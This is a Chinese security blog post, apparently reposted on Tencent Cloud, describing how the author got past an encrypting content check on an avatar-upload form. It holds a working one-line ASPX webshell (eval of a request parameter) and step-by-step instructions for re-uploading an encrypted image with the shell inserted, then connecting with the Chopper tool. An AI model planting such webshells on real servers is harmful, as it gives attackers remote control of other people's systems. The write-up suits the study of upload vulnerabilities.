专栏首页小白帽学习之路涨见识!如何用骚思路绕过上传后文件内容检测

涨见识!如何用骚思路绕过上传后文件内容检测

前言分析:

关于这个上传点我大概研究了三个多小时,上传的时候他会将上传后的文件内容进行Base64加密然后上传,之后我测试上传图片马是可以上传进去的,但是无法解析。

突破上传:

研究请求包时发现:

上传类型修改成aspx类型即可上传aspx文件

经测试是可以上传进去的

但是访问上传路径后发现解析失败,并且shell的代码也找不到了

到这里,其实我脑壳已经有点懵逼了,因为完全第一次碰到这种事情完全不知道是什么原因导致文件解析失败。

只好一点一点测试,经过某大佬提醒,说可以先上传一个jpg后缀的图片马,然后保存上传后的文件排查一下是否在上传过程中对内容进行加密,然后服务端在进行解密。

思路测试:

我们上传后访问图片路径,然后保存下来图片用编辑器打开发现

全乱码了,被加密了,当我有点懵的时候小眼睛一撇,看到了不知道是神马玩意的玩意暴露在我的眼前

是的,就是这个,我就想问谁家图片会出现这种玩意?

所以我们直接在此处随便插入了一句话:

<%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>

之后上传我们经过二次插入一句话的图片,将后缀改为aspx即可

菜刀连接成功!

总结:

1.上传点为头像上传,各位可以看看自己的项目头像上传有没有测试哦~

2.若文章没看懂请看此处:

1.当你上传任何文件后,他会对文件的内容进行加密,然后当你访问此文件时服务端在进行解密然后将解密后的显示出来(但是内容还是加密的),若解密后文件出错,那么久无法解析,也会报错,这就是为什么上传的aspx会无法解析无法连接shell。

2.当我们上传一个完整的图片马他会将内容加密,我们把加密后的文件保存下来,然后用编辑器再次插入一句话木马,然后再次上传,那么上传时会判断你上传的文件符合他加密的规则,那么这时就不会进行加密,直接上传进去用菜刀连接shell即可!

本文分享自微信公众号 - 程序员阿甘(gh_a2e36d69d566),作者:阿浪

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-12-30

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 记一次渗透竞赛中的思路笔记~

    因为是一次做渗透而且又是靶场,所以信息搜集也就没有做,拿到靶场网址后直接打开网页看看有什么东西,发现了一个登录口,想着有登录那就有注册,所以思路就出来了:注册→...

    7089bAt@PowerLi
  • 实战 | 小小曲折渗透路之文件上传绕过

    Upload-labs是一个帮你总结所有类型的上传漏洞的靶场,包括常见的文件上传漏洞

    7089bAt@PowerLi
  • Kali Linux Web渗透测试手册(第二版) - 6.2 - 文件包含和文件上传

    我们在前面的章节中了解到的,当开发人员对用户上传的文件所在的路径不做安全校验或者用户恶意上传文件使其包含当前路径的某些源码时,就会发生文件上传或者文件包含漏洞。...

    7089bAt@PowerLi
  • element ui 上传图片

    3.如果是手动上传,可以设置ref,然后在button事件里面使用this.$refs.adImg.submit();上传;

    wust小吴
  • 记一次渗透竞赛中的思路笔记~

    因为是一次做渗透而且又是靶场,所以信息搜集也就没有做,拿到靶场网址后直接打开网页看看有什么东西,发现了一个登录口,想着有登录那就有注册,所以思路就出来了:注册→...

    7089bAt@PowerLi
  • H5文件上传测试点,整理一波。

    (5)批量上传多个文件过程中,一部分文件被移动,或被删除,或被改名,是否会影响其他文件的上传;

    ITester软件测试小栈
  • DVWA搭建与文件上传漏洞演示

    目前是一名在校学生,有自己的信仰与爱好,平时喜欢弹着吉他唱着歌亦或在电脑面前独自享受着汲取知识的快乐。

    TeamsSix
  • Spring Boot 如何上传大文件?骚操作~

    最近遇见一个需要上传超大大文件的需求,调研了七牛和腾讯云的切片分段上传功能,因此在此整理前端大文件上传相关功能的实现。

    架构师修炼
  • 【实战篇】记一次文件上传漏洞绕过

    怀疑是waf检查上传内容进行了过滤,尝试绕过。Boundary字段会标识我们上传的内容:

    一名白帽的成长史
  • PHP实现带进度条的Ajax文件上传功能示例

    本文实例讲述了PHP实现带进度条的Ajax文件上传功能。分享给大家供大家参考,具体如下:

    砸漏

扫码关注云+社区

领取腾讯云代金券